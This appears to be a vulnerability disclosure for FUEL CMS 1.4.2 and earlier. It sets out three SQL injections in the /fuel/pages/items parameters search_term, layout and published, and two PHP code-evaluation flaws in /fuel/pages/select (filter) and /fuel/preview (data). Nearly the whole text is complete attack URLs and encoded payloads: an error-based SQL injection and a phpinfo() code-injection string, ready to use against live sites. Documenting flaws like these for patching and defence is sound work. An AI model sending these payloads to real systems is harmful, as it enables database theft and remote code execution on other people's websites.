Description
Vulnerability - Code Evaluations & SQL Injections
Environment
- Version: <=1.4.2
- OS: Unix, Windows
- Web server: Any web server
- PHP: <=7.2
- Database: Any database
Vulnerability Tree
- SQL Injection
1.1. /fuel/pages/items (GET = search_term)
1.2. /fuel/pages/items (GET = layout)
1.3. /fuel/pages/items (GET = published) - Code Evaluation
2.1. /fuel/pages/select/ (GET = filter)
2.2. /fuel/preview (POST = data)
1.1. SQL Injection in /fuel/pages/items (GET = search_term)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: search_term
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
1.2. SQL Injection in /fuel/pages/items (GET = layout)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: layout
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
1.3. SQL Injection in /fuel/pages/items (GET = published)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&limit=50
Parameter Name: published
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
2.1. Code Evaluation in /fuel/pages/select/ (GET = filter)
URL: http://{domain}/{fuelcms_path}/fuel/pages/select/?nocache=1507880376191&input=&target=&title=&class=&pdfs=&filter=%27%2b phpinfo() %2b%27
Parameter Name: filter
Parameter Type: GET
Attack Pattern: %27%2b phpinfo() %2b%27
2.2. Code Evaluation in /fuel/preview (POST = data)
URL: http://{domain}/{fuelcms_path}/fuel/preview?module=pages&field=vars--body
Parameter Name: data
Parameter Type: POST
Attack Pattern: %27%2b phpinfo() %2b%27